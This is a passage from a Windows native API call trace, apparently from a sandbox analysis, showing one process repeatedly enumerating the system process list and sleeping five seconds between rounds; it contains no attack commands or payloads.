Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 